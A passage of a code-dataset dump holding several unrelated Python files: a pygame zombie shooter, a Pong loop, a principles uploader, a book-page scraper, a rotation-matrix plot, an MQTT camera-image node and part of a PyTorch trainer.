0, 0\r\n for i in range(0, 30):\r\n pygame.draw.rect(screen, (255, 255, 255), (g))\r\n g[0] += 40\r\n g[0] = 0\r\n if anim + 1 >= 6:\r\n anim = 0\r\n if R:\r\n screen.blit(H[2], (x, y))\r\n if not(R):\r\n if left:\r\n \r\n if isJump:\r\n screen.blit(LJ, (x, y))\r\n else:\r\n screen.blit(walkL[anim // 3], (x, y))\r\n screen.blit(ak47L, (x + width/2-40, y + height/2+ 20))\r\n anim += 1\r\n elif right:\r\n \r\n if isJump:\r\n \r\n screen.blit(RJ, (x, y))\r\n else:\r\n screen.blit(walkR[anim // 3], (x, y))\r\n screen.blit(ak47R, (x + width/2-20, y + height/2 +20))\r\n anim += 1\r\n \r\n \r\n elif up:\r\n if face == 'l':\r\n screen.blit(walkYL[anim // 3], (x, y))\r\n screen.blit(ak47L, (x + width / 2 - 40, y + height / 2 + 20))\r\n anim += 1\r\n \r\n elif face == 'r':\r\n screen.blit(walkYR[anim // 3], (x, y))\r\n screen.blit(ak47R, (x + width / 2 - 20, y + height / 2 + 20))\r\n anim += 1\r\n\r\n\r\n else:\r\n if isJump:\r\n if face == 'r':\r\n screen.blit(S2, (x, y))\r\n elif face == 'l':\r\n 
screen.blit(JL, (x, y))\r\n else:\r\n if face == 'r':\r\n screen.blit(StandAn, (x, y))\r\n screen.blit(ak47R, (x + width / 2 - 20, y + height / 2 + 20))\r\n elif face == 'l':\r\n screen.blit(SS, (x, y))\r\n screen.blit(ak47L, (x + width / 2 - 40, y + height / 2 + 20))\r\n\r\n for bull in bulls:\r\n bull.draw(screen)\r\n for ens in enemy: \r\n ens.draw(screen, x, R)\r\n boss = Boss(l0)\r\nall_sprites = pygame.sprite.Group()\r\nrunning = True\r\nbulls = []\r\nenemy = []\r\n\r\ndef start_screen():\r\n intro_text = [\" Вас приветствует игра DavArm\", \r\n \" Правила игры очень просты:\", \r\n \" Отстреливайтесь от зомби и набирайте очки\", \r\n \" При нажатии на определеные клавиши пробуждается босс\",\r\n \" В игре скрыты несколько пасхалок, характристика которых есть в описании \", \r\n \" Максимальное количество зомби на карте 20\",\"\",\"\",\"\",\"\" \r\n \" На кнопки 1-5 можно переключать музыку\", \r\n \" Желаем удачи!\", \r\n \" Для начала игры нажми ЛКМ\"]\r\n\r\n fon = pygame.transform.scale(pygame.image.load('data\\prfiles\\zastavka1.png'), (WIDTH, HEIGHT))\r\n screen.blit(fon, (0, 0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 40)\r\n text_coord = 50\r\n for line in intro_text:\r\n string_rendered = font.render(line, 1, pygame.Color(255, 255, 255))\r\n intro_rect = string_rendered.get_rect()\r\n text_coord += 10\r\n intro_rect.top = text_coord\r\n intro_rect.x = 10\r\n text_coord += intro_rect.height\r\n screen.blit(string_rendered, intro_rect)\r\n mus = True\r\n while True:\r\n pygame.display.flip() \r\n while mus:\r\n pygame.mixer.music.load(file1) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1) \r\n mus = False\r\n for event in pygame.event.get(): \r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n menu.stop()\r\n return \r\nboss = Boss(l0)\r\nstart_screen()\r\nwhile running:\r\n keys = pygame.key.get_pressed()\r\n if D:\r\n pygame.mixer.music.load(file[0])\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1) \r\n D = False\r\n if not(boss1):\r\n if keys[pygame.K_1]:\r\n pygame.mixer.music.load(file[0])\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_2]:\r\n pygame.mixer.music.load(file[1]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_3]:\r\n pygame.mixer.music.load(file[2]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_4]:\r\n pygame.mixer.music.load(file[3]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n if keys[pygame.K_5]:\r\n pygame.mixer.music.load(file[4]) \r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1) \r\n if keys[pygame.K_f]:\r\n if not(R):\r\n R = True \r\n if R:\r\n if keys[pygame.K_h]:\r\n hardmod = True\r\n if keys[pygame.K_b]:\r\n boss1 = True\r\n else:\r\n if keys[pygame.K_b]:\r\n boss1 = True \r\n \r\n if keys[pygame.K_o]:\r\n ok = True \r\n\r\n \r\n#GP[0].play()\r\n drawWin()\r\n pygame.time.delay(30)\r\n for event in pygame.event.get():\r\n if (event.type == pygame.QUIT) or keys[pygame.K_ESCAPE]:\r\n running = False\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.pos[0] > 540 and event.pos[0] < 580 and event.pos[1] > 450 and event.pos[1] < 460:\r\n pygame.mixer.music.load(Golosovanie)\r\n pygame.mixer.music.set_volume(10)\r\n pygame.mixer.music.play(-1) \r\n if not isJump:\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\r\n \r\n \r\n if 
lastM == 'right':\r\n facing = 1\r\n else:\r\n facing = -1\r\n if len(bulls) < 5:\r\n drawWin() \r\n ran = random.randint(0,7)\r\n #shoots[ran].play()\r\n bulls.append(snaryad(round(x + width // 2), round(y + height // 2 + 20), facing))\r\n if not(boss1):\r\n count += 1\r\n \r\n if len(enemy) < count:\r\n if count >= 20:\r\n #death.play()\r\n #pygame.mixer.music.stop()\r\n running = False\r\n dead = True\r\n drawWin() \r\n enemy.append(Enemy(x, y, l, all_sprites)) \r\n for bull in bulls:\r\n if bull.x < x0 and bull.x > 0:\r\n bull.x += bull.vel\r\n else:\r\n bulls.pop(bulls.index(bull))\r\n\r\n \r\n if y <= 0:\r\n while I:\r\n pygame.mixer.music.load(cry) \r\n pygame.mixer.music.set_volume(10)\r\n pygame.mixer.music.play(-1) \r\n I = False\r\n screen.blit(SCR, (0, 0)) \r\n if keys[pygame.K_q]:\r\n if screen.get_flags() & pygame.FULLSCREEN:\r\n pygame.display.set_mode(size)\r\n else:\r\n pygame.display.set_mode(size, pygame.FULLSCREEN)\r\n elif keys[pygame.K_a] and x > 5:\r\n face = 'l'\r\n if isJump:\r\n x -= speed + 10\r\n else:\r\n x -= speed\r\n up = False\r\n left = True\r\n right = False\r\n lastM = 'left'\r\n elif keys[pygame.K_d] and x < l[0] - width - 5:\r\n face = 'r'\r\n if isJump:\r\n x += speed + 10\r\n else:\r\n x += speed\r\n up = False\r\n right = True\r\n left = False\r\n lastM = 'right'\r\n else:\r\n up = False\r\n left = False\r\n right = False\r\n\r\n if not (isJump):\r\n if keys[pygame.K_w] and y > 300 or (x < 300 and x > 290):\r\n y -= speed\r\n up = True\r\n if keys[pygame.K_s] and y < l[1] - height - 5:\r\n y += speed\r\n up = True\r\n if keys[pygame.K_SPACE]:\r\n isJump = True\r\n else:\r\n if jump >= -10:\r\n if jump < 0:\r\n y += (jump ** 2) // 4\r\n else:\r\n y -= (jump ** 2) // 4\r\n jump -= 1\r\n else:\r\n isJump = False\r\n jump = 10\r\n for ens in enemy:\r\n \r\n if False:\r\n enemy.pop(enemy.index(ens)) \r\n score += 10\r\n \r\n else:\r\n if not(R):\r\n C = random.randint(0, 5)\r\n if ens.x1 < x:\r\n if C ==1:\r\n ens.x += ens.vel + 50 \r\n ens.x1 += ens.vel \r\n elif ens.x1 > x:\r\n if C ==1:\r\n ens.x -= ens.vel + 50 \r\n ens.x1 -= ens.vel \r\n if ens.y1 < y:\r\n ens.y1 += ens.vel \r\n elif ens.y1 > y:\r\n ens.y1 -= ens.vel \r\n try:\r\n for bull in bulls:\r\n for ens in enemy:\r\n if bull.y >= ens.y1 and bull.y <= ens.y1 + 110:\r\n if bull.x > x:\r\n if bull.x >= ens.x1 and bull.x <= ens.x1 + 80:\r\n bulls.pop(bulls.index(bull))\r\n enemy.pop(enemy.index(ens))\r\n count -= 1\r\n score += 10\r\n else:\r\n if bull.x >= ens.x1 and bull.x <= ens.x1 + 80:\r\n bulls.pop(bulls.index(bull))\r\n enemy.pop(enemy.index(ens))\r\n count -= 1 \r\n score += 10\r\n \r\n except:\r\n pass\r\n try:\r\n for ens in enemy: \r\n if not (isJump):\r\n ax1, ay1, ax2, ay2 = [ens.x1, ens.y1, 40, 60]\r\n ax2 = ax1 + ax2\r\n ay2 = ay1 + ay2\r\n \r\n bx1, by1, bx2, by2 = [x, y, 40, 60]\r\n bx2 = bx1 + bx2\r\n by2 = by1 + by2\r\n \r\n s1 = ( ax1>=bx1 and ax1<=bx2 ) or ( ax2>=bx1 and ax2<=bx2 )\r\n s2 = ( ay1>=by1 and ay1<=by2 ) or ( ay2>=by1 and ay2<=by2 )\r\n s3 = ( bx1>=ax1 and bx1<=ax2 ) or ( bx2>=ax1 and bx2<=ax2 )\r\n s4 = ( by1>=ay1 and by1<=ay2 ) or ( by2>=ay1 and by2<=ay2 )\r\n if ((s1 and s2) or (s3 and s4)) or ((s1 and s4) or (s3 and s2)) :\r\n #pygame.mixer.music.stop()\r\n running = False\r\n dead = True \r\n except:\r\n pass\r\n\r\n if boss1:\r\n if S:\r\n pygame.mixer.music.load(bossM)\r\n pygame.mixer.music.set_volume(10)\r\n pygame.mixer.music.play(-1) \r\n S = False\r\n if not(bossD):\r\n if hardmod:\r\n C = random.randint(0, 20)\r\n else: \r\n C = 0\r\n if boss.x < 
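The jump branch in the Davarm.py loop counts jump down from 10 to -10 and moves y by (jump ** 2) // 4, up while positive and down once negative, which traces a symmetric arc over 21 frames. A standalone sketch of just that arc (pygame's y axis grows downward, so the smallest y is the apex):

```python
# Reproduce the record's jump arc outside the game loop.
y, jump = 300, 10
heights = []
while jump >= -10:
    if jump < 0:
        y += (jump ** 2) // 4   # falling
    else:
        y -= (jump ** 2) // 4   # rising
    heights.append(y)
    jump -= 1
print(heights[0], min(heights), heights[-1])  # 275 205 300
```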
x:\r\n \r\n if C ==1:\r\n boss.x += boss.vel + 60\r\n else:\r\n boss.x += boss.vel - 9\r\n elif boss.x > x:\r\n \r\n if C ==1:\r\n boss.x -= boss.vel + 60 \r\n else: \r\n boss.x -= boss.vel -9\r\n if boss.y < y:\r\n boss.y += boss.vel - 9\r\n elif boss.y > y:\r\n boss.y -= boss.vel - 9\r\n try:\r\n for bull in bulls:\r\n if bull.y >= boss.y and bull.y <= boss.y + 140:\r\n if bull.x > x:\r\n if bull.x >= boss.x and bull.x <= boss.x + 90:\r\n bulls.pop(bulls.index(bull))\r\n boss.heal -= 1\r\n else:\r\n if bull.x >= boss.x and bull.x <= boss.x + 90:\r\n bulls.pop(bulls.index(bull))\r\n boss.heal -= 1 \r\n except:\r\n pass \r\n if boss.heal <= 0 and not(hardmod):\r\n win1 = True \r\n bossD = True\r\n if hardmod:\r\n if boss.heal <= 0:\r\n hx, hy = boss.x, boss.y \r\n screen.blit(Hat, (hx, hy)) \r\n bossD = True\r\n ax1, ay1, ax2, ay2 = [hx, hy, 50, 50]\r\n ax2 = ax1 + ax2\r\n ay2 = ay1 + ay2\r\n \r\n bx1, by1, bx2, by2 = [x, y, 40, 60]\r\n bx2 = bx1 + bx2\r\n by2 = by1 + by2\r\n \r\n s1 = ( ax1>=bx1 and ax1<=bx2 ) or ( ax2>=bx1 and ax2<=bx2 )\r\n s2 = ( ay1>=by1 and ay1<=by2 ) or ( ay2>=by1 and ay2<=by2 )\r\n s3 = ( bx1>=ax1 and bx1<=ax2 ) or ( bx2>=ax1 and bx2<=ax2 )\r\n s4 = ( by1>=ay1 and by1<=ay2 ) or ( by2>=ay1 and by2<=ay2 )\r\n if ((s1 and s2) or (s3 and s4)) or ((s1 and s4) or (s3 and s2)) : \r\n win = True \r\n if win:\r\n screen.fill((0,0,0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 100)\r\n text1 = font.render(\"You won\",True, (255, 0, 0))\r\n text2 = font.render(\"Congrutilations!\",True, (255, 0, 0))\r\n screen.blit(text1, [360,150])\r\n screen.blit(text2, [240,250])\r\n if win1:\r\n screen.fill((0,0,0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 100)\r\n text1 = font.render(\"You won\",True, (255, 0, 0))\r\n text2 = font.render(\"Congrutilations!\",True, (255, 0, 0))\r\n font1 = pygame.font.Font(r'data\\prfiles\\13882.otf', 80)\r\n text3 = font1.render(\"Press H before boss for hardmod\",True, (255, 0, 0))\r\n screen.blit(text1, [360,150])\r\n screen.blit(text2, [240,250]) \r\n screen.blit(text3, [60,350]) \r\n \r\n if not(win):\r\n if not(bossD):\r\n if not (isJump):\r\n ax1, ay1, ax2, ay2 = [boss.x, boss.y, 90, 120]\r\n ax2 = ax1 + ax2\r\n ay2 = ay1 + ay2\r\n \r\n bx1, by1, bx2, by2 = [x, y, 40, 60]\r\n bx2 = bx1 + bx2\r\n by2 = by1 + by2\r\n \r\n s1 = ( ax1>=bx1 and ax1<=bx2 ) or ( ax2>=bx1 and ax2<=bx2 )\r\n s2 = ( ay1>=by1 and ay1<=by2 ) or ( ay2>=by1 and ay2<=by2 )\r\n s3 = ( bx1>=ax1 and bx1<=ax2 ) or ( bx2>=ax1 and bx2<=ax2 )\r\n s4 = ( by1>=ay1 and by1<=ay2 ) or ( by2>=ay1 and by2<=ay2 )\r\n if ((s1 and s2) or (s3 and s4)) or ((s1 and s4) or (s3 and s2)) : \r\n running = False\r\n dead = True \r\n if not(bossD):\r\n boss.draw()\r\n font = pygame.font.Font(None, 50)\r\n text = font.render(\"Score:\",True, (255, 0, 0))\r\n screen.blit(text, [0, 0]) \r\n font = pygame.font.Font(None, 50)\r\n text = font.render(str(score), True, (255, 0, 0))\r\n screen.blit(text, [120, 0]) \r\n if ok and okx <= 1500 and oky >= -300:\r\n okx += 10\r\n oky -= 10\r\n screen.blit(Ok, (okx, oky)) \r\n pygame.display.flip()\r\n \r\nwhile dead:\r\n pygame.display.flip()\r\n for event in pygame.event.get():\r\n if (event.type == pygame.QUIT):\r\n dead = False \r\n if boss:\r\n pygame.mixer.music.load(die[1])\r\n pygame.mixer.music.play() \r\n boss = False\r\n if S:\r\n pygame.mixer.music.load(die[0])\r\n pygame.mixer.music.play() \r\n S = False\r\n screen.fill((0,0,0))\r\n font = pygame.font.Font(r'data\\prfiles\\13882.otf', 120)\r\n text1 = font.render(\"Game 
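The four-flag s1..s4 interval test copied several times through Davarm.py (player vs. zombie, vs. hat, vs. boss) is an axis-aligned bounding-box overlap check; pygame ships the same test as Rect.colliderect, which each copy of that block could call instead. A sketch:

```python
# AABB overlap via pygame.Rect instead of the hand-rolled s1..s4 flags.
import pygame

player = pygame.Rect(100, 100, 40, 60)   # x, y, width, height
zombie = pygame.Rect(120, 130, 40, 60)
print(player.colliderect(zombie))                         # True: boxes overlap
print(player.colliderect(pygame.Rect(500, 500, 40, 60)))  # False: far apart
```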
Over\",True, (255, 0, 0))\r\n text2 = font.render(\"Your score: \" + str(score),True, (255, 0, 0))\r\n screen.blit(text1, [300,225])\r\n screen.blit(text2, [230,325])\r\npygame.quit()","repo_name":"mionitsa/DavArm","sub_path":"Davarm.py","file_name":"Davarm.py","file_ext":"py","file_size_in_byte":23792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21683235859","text":"def palindromeV3(ch):\n i=0\n l=len(ch)\n test=True\n while (i= 255 or counter <= 0:\r\n add *= -1\r\n\r\n PG.changeBallColour((255, counter, 50))\r\n PG.changeBackgroundColour((125, 50, counter))\r\n\r\n PG.drawStage()\r\n","repo_name":"RavenDuffy/Pong-Syllabus","sub_path":"PongGame.py","file_name":"PongGame.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30632451597","text":"# importing the requests library\nimport re\n\nimport requests\n\n# For production\nURL = \"https://principles.jackow98.site/Principles\"\n\n# For development\n# URL = \"http://localhost/Principles\"\n\ntopic = \"\"\nprinciple = \"\"\ntopicCount = 0\nparentPrincipleCount = 0\nchildPrincipleCount = 0\nidentifier = \"\"\n\ntopicPattern = re.compile(\"### (.*)\")\nparentPrinciplePattern = re.compile(\"- \\*\\*(.*)\\*\\*\")\nchildPrinciplePattern = re.compile(\"[0-9]*\\.\\s(.*)\")\n\nwith open('principles.md', 'r', encoding='utf8') as fin:\n\n for line in fin:\n strippedLine = line.strip().replace(\"’\", \"'\")\n\n topicMatch = topicPattern.match(strippedLine)\n parentMatch = parentPrinciplePattern.match(strippedLine)\n childMatch = childPrinciplePattern.match(strippedLine)\n\n if topicMatch:\n topic = topicMatch.group(1)\n topicCount += 1\n parentPrincipleCount = 0\n childPrincipleCount = 0\n\n if parentMatch:\n principle = parentMatch.group(1)\n parentPrincipleCount += 1\n childPrincipleCount = 0\n\n if childMatch:\n principle = childMatch.group(1)\n childPrincipleCount += 1\n\n if parentMatch or childMatch:\n identifier = f\"{topic}.{parentPrincipleCount}.{childPrincipleCount}\"\n data = {\n \"topic\": topic,\n \"id\": identifier,\n \"principleText\": principle\n }\n headers = {'charset=utf-8'}\n\n r = requests.post(url=URL, json=data)\n if r.status_code != 200:\n print(principle + \" - Not added\")\n\n # print(f\"{identifier}, {principle}\")\n principle = \"\"\n","repo_name":"jackow98/principles","sub_path":"uploadPrinciples.py","file_name":"uploadPrinciples.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11223488276","text":"__author__ = 'Tom'\n\nfrom distutils.core import setup\n\nsetup(\n name='pomodoro',\n version='0.1',\n author='Tom Martin',\n author_email='thomas.r.martin@gmail.com',\n packages=['pomodoro', 'pomodoro.test'],\n scripts=['bin/stowe-towels.py',],\n url='http://pypi.python.org/pypi/pomodoro/',\n license='LICENSE.txt',\n description='Command line pomodoro',\n long_description=open('README.txt').read(),\n install_requires=[\n # \"Django >= 1.1.1\",\n # \"caldav == 0.1.4\",\n ],\n)\n","repo_name":"twoflowers/pomodoro","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20031756088","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\nresponse = 
requests.get(\"https://book24.ru/product/ya-tvoy-desert-5493403/\")\n\ntext = response.text\n\nsoup = bs(text, 'html.parser')\n\nparams = soup.select(\".item-tab__chars-item\")\n\nfor param in params:\n lable = param.select_one(\".item-tab__chars-key\").text\n if lable == \"Автор:\":\n author_name = param.select_one(\".item-tab__chars-value a\")\n print(author_name['data-link'])\n print(f\"Автор: {author_name.text}. Url: \")\n break\n","repo_name":"MGDas/DjangoBook","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42702035165","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport math\n## new code\n\n\nroll = 2.6335\npitch = math.pi/2\nyaw = math.pi/3.24\n\n\nyawMatrix = np.matrix([\n[math.cos(yaw), -math.sin(yaw), 0],\n[math.sin(yaw), math.cos(yaw), 0],\n[0, 0, 1]\n])\n\npitchMatrix = np.matrix([\n[math.cos(pitch), 0, math.sin(pitch)],\n[0, 1, 0],\n[-math.sin(pitch), 0, math.cos(pitch)]\n])\n\nrollMatrix = np.matrix([\n[1, 0, 0],\n[0, math.cos(roll), -math.sin(roll)],\n[0, math.sin(roll), math.cos(roll)]\n])\n\nR = yawMatrix * pitchMatrix * rollMatrix\n\ntheta = math.acos(((R[0, 0] + R[1, 1] + R[2, 2]) - 1) / 2)\nmulti = 1 / (2 * math.sin(theta))\n\nrx = multi * (R[2, 1] - R[1, 2]) * theta\nry = multi * (R[0, 2] - R[2, 0]) * theta\nrz = multi * (R[1, 0] - R[0, 1]) * theta\n\n##\n\nu = math.cos(yaw) * math.cos(pitch)\nv = math.sin(yaw) * math.cos(pitch)\nw = math.sin(pitch)\nfig = plt.figure()\nax = fig.add_subplot(111, projection = '3d')\nax.quiver(0,0,0,u,v,w)\nax.set_xlim([0, 5])\nax.set_ylim([0, 5])\nax.set_zlim([0, 5])\nplt.show()\n\nsoa = np.array([0, 0, 1, rx, ry, rz])\nprint(rx,ry,rz)\nX = soa[0]\nY = soa[1]\nZ = soa[2]\nU = soa[3]\nV = soa[4]\nW = soa[5]\n# fig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n# ax.quiver(X, Y, Z, U, V, W)\n# ax.set_xlim([-1, 0.5])\n# ax.set_ylim([-1, 1.5])\n# ax.set_zlim([-1, 8])\n# plt.show()","repo_name":"levw-eats-tacos/GPS-IMU","sub_path":"BerryIMU/TestFiles (for reference)/testdata.py","file_name":"testdata.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70347980968","text":"import base64\nimport hashlib\nimport json\nimport os\nimport pathlib\nimport time\nfrom datetime import datetime\n\nfrom homie.node.node_base import Node_Base\nfrom homie.node.property.property_datetime import Property_DateTime\nfrom homie.node.property.property_string import Property_String\n\n\nclass Node_Image(Node_Base):\n \"\"\"The recent image taken by the camnode's camera\n\n scanner/camnode-hwaddr/recent-image/...\n scanner/camnode-hwaddr/recent-image/filename\n scanner/camnode-hwaddr/recent-image/datetime\n scanner/camnode-hwaddr/recent-image/file\n \"\"\"\n\n # image file storage directoy\n IMAGE_DIR = os.path.join(pathlib.Path.home(), 'images')\n\n def __init__(\n self,\n device,\n id=\"recent-image\",\n name=\"Recent Image\",\n type_=\"file\",\n retain=True,\n qos=1,\n ):\n\n super().__init__(device, id, name, type_, retain, qos)\n\n os.makedirs(Node_Image.IMAGE_DIR, mode=0o755, exist_ok=True)\n assert os.path.exists(Node_Image.IMAGE_DIR)\n\n self.device_name = device.name\n\n self.filename = Property_String(node=self, id='filename', name='Filename')\n self.datetime = Property_DateTime(\n node=self,\n id='datetime',\n name='File Date',\n 
data_format='%Y-%m-%dT%H:%M:%S.%f',\n value=datetime.fromisoformat('1970-01-01').strftime('%Y-%m-%dT%H:%M:%S.%f'),\n )\n\n file_meta = {}\n file_meta['encoding'] = {}\n file_meta['encoding']['name'] = 'file encoding'\n file_meta['encoding']['value'] = 'base64'\n file_meta['hashfunc'] = {}\n file_meta['hashfunc']['name'] = 'hashlib'\n file_meta['hashfunc']['value'] = 'blake2s'\n file_meta['jsonfiledata'] = {}\n file_meta['jsonfiledata']['name'] = 'json_var'\n file_meta['jsonfiledata']['value'] = 'b64file'\n file_meta['jsonfilehash'] = {}\n file_meta['jsonfilehash']['name'] = 'json_var'\n file_meta['jsonfilehash']['value'] = 'filehash'\n self.file = Property_String(node=self, id='file', name='File', meta=file_meta)\n\n self.add_property(self.filename)\n self.add_property(self.datetime)\n self.add_property(self.file)\n\n def __str__(self):\n return str(self.__class__.__name__)\n\n def new_filename(self):\n \"\"\"Format: date_hwaddr.png\"\"\"\n device_name = self.device_name\n now = datetime.now() # current date and time\n dt = now.strftime('%Y%m%d%H%M%S')\n return dt + '_' + device_name + '.png'\n\n def new_file(self):\n return os.path.join(Node_Image.IMAGE_DIR, self.new_filename())\n\n def update_recent_image(self, file):\n \"\"\"Refreshes the recent-image node\"\"\"\n imgfile = ImageFile(file)\n\n self.filename.value = imgfile.filename\n self.datetime.value = imgfile.mtime\n self.file.value = imgfile.json\n\n\nclass ImageFile(object):\n \"\"\"Represents all information about an image file\"\"\"\n\n def __init__(self, file):\n assert os.path.exists(file)\n self.file = file\n self.b64file = self.b64(file)\n self.hashfunc = 'blake2s'\n self.filehash = self.blake2s(file)\n\n @property\n def filename(self):\n return os.path.basename(self.file)\n\n @property\n def mtime(self):\n # modTimesinceEpoc = os.path.getmtime(self.file)\n # return time.strftime('%Y-%m-%dT%H:%M:%S.000', time.localtime(modTimesinceEpoc))\n modTime = datetime.fromtimestamp(os.stat(self.file).st_mtime)\n return modTime.strftime('%Y-%m-%dT%H:%M:%S.%f')\n\n @property\n def json(self):\n return json.dumps(self.__dict__)\n\n def b64(self, file):\n with open(file, 'rb') as f:\n b64string = base64.b64encode(f.read()).decode('ASCII')\n return b64string\n\n def blake2s(self, file):\n hash_blake2s = hashlib.blake2s()\n with open(file, 'rb') as f:\n for chunk in iter(lambda: f.read(4096), b''):\n hash_blake2s.update(chunk)\n return hash_blake2s.hexdigest()\n","repo_name":"cdeck3r/3DScanner","sub_path":"src/homie-nodes/homie-camnode/node_image.py","file_name":"node_image.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39808364504","text":"import sys\nimport random\nimport os\nimport os.path as osp\n\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.multiprocessing as mp\n\nsys.path.append('./')\n\nfrom sembm.core import get_arguments # noqa\nfrom sembm.apis import evaluate # noqa\nfrom sembm.datasets import get_num_classes, get_class_names, build_dataset # noqa\nfrom sembm.core import DistBaseTrainer, cfg, cfg_from_file, cfg_from_list # noqa\nfrom sembm.utils import ( # noqa\n Checkpointer, Writer, convert_model, is_enabled, is_main_process, reduce_dict, reduce, build_dataloader,\n init_process_group, LrScheduler)\n\n\nclass IterLoader:\n\n def __init__(self, dataloader):\n self._dataloader = dataloader\n self.iter_loader = iter(self._dataloader)\n self._epoch = 0\n\n @property\n def 
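ImageFile in the node_image.py record pairs a chunked blake2s digest with a base64 copy of the file for the MQTT payload. A self-contained sketch of both steps over a throwaway temp file standing in for a camera image:

```python
# Hash in 4 KiB chunks (as in the record) and base64-encode the same bytes.
import base64, hashlib, tempfile

with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"fake png bytes")
    path = f.name

h = hashlib.blake2s()
with open(path, "rb") as f:
    for chunk in iter(lambda: f.read(4096), b""):
        h.update(chunk)
print(h.hexdigest()[:16], "...")  # first bytes of the digest

with open(path, "rb") as f:
    print(base64.b64encode(f.read()).decode("ascii"))  # ZmFrZSBwbmcgYnl0ZXM=
```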
epoch(self):\n return self._epoch\n\n def __next__(self):\n try:\n data = next(self.iter_loader)\n except StopIteration:\n self._epoch += 1\n if hasattr(self._dataloader.sampler, 'set_epoch'):\n self._dataloader.sampler.set_epoch(self._epoch)\n self.iter_loader = iter(self._dataloader)\n data = next(self.iter_loader)\n\n return data\n\n def __len__(self):\n return len(self._dataloader)\n\n\nclass Trainer(DistBaseTrainer):\n\n def __init__(self, cfg, model, optim, lr_sche, train_loader, val_loader, writer, checkpointer, **kwargs):\n super(Trainer, self).__init__(cfg, model, optim, lr_sche, train_loader, val_loader, writer, checkpointer,\n **kwargs)\n\n self.nclass = get_num_classes(cfg.DATASET.NAME)\n self.classNames = get_class_names(cfg.DATASET.NAME)\n assert self.nclass == len(self.classNames)\n\n self.start_epoch = self.checkpointer.start_epoch\n self.start_iter = self.checkpointer.start_iter\n self.best_score = self.checkpointer.best_score\n\n self.eval_period = cfg.TRAIN.EVAL_PERIOD\n self._iter = self.start_iter\n self._epoch = self.start_epoch\n\n def train_epoch(self, epoch):\n assert self._epoch == epoch\n self.model.train()\n\n PRETRAIN = self._epoch <= cfg.TRAIN.PRETRAIN\n self.writer.update_data_timepoint()\n for dataset_dict in self.train_loader:\n self.writer.update_forward_timepoint()\n # to cuda\n for k in dataset_dict.keys():\n if isinstance(dataset_dict[k], torch.Tensor):\n dataset_dict[k] = dataset_dict[k].cuda()\n\n # forward\n dataset_dict['PRETRAIN'] = PRETRAIN\n output = self.model(dataset_dict)\n losses = {k: v.mean() for k, v in output.items() if k.startswith('loss')}\n loss = sum(losses.values())\n\n self.writer.update_backward_timepoint()\n # backward\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n\n self.lr_sche.adjust_learning_rate(self._epoch, self._iter)\n\n self.writer.update_data_timepoint()\n # log\n loss = reduce(loss)\n losses = reduce_dict(losses)\n if is_main_process():\n log_losses = {k: v.item() for k, v in losses.items() if k.startswith('loss')}\n log_losses['total_loss'] = loss.item()\n self.writer._iter_log_losses(log_losses, self.optim.param_groups[0]['lr'], self._epoch, self._iter)\n self._iter += 1\n\n self._epoch += 1\n\n def train_iter(self, iter, iter_loader):\n assert self._iter == iter\n self.model.train()\n\n PRETRAIN = self._epoch <= cfg.TRAIN.PRETRAIN\n self.writer.update_data_timepoint()\n dataset_dict = next(iter_loader)\n self.writer.update_forward_timepoint()\n # to cuda\n for k in dataset_dict.keys():\n if isinstance(dataset_dict[k], torch.Tensor):\n dataset_dict[k] = dataset_dict[k].cuda()\n\n # forward\n dataset_dict['PRETRAIN'] = PRETRAIN\n output = self.model(dataset_dict)\n losses = {k: v.mean() for k, v in output.items() if k.startswith('loss')}\n loss = sum(losses.values())\n\n self.writer.update_backward_timepoint()\n # backward\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n\n self.lr_sche.adjust_learning_rate(self._epoch, self._iter)\n\n self.writer.update_data_timepoint()\n # log\n loss = reduce(loss)\n losses = reduce_dict(losses)\n if is_main_process():\n log_losses = {k: v.item() for k, v in losses.items() if k.startswith('loss')}\n log_losses['total_loss'] = loss.item()\n self.writer._iter_log_losses(log_losses, self.optim.param_groups[0]['lr'], self._epoch, self._iter)\n\n self._epoch = iter_loader.epoch + 1\n self._iter += 1\n\n def validation(self, epoch, iter, checkpoint=False):\n self.model.eval()\n IoU_dict = {}\n for key in ['cam']:\n with torch.no_grad():\n IoU = 
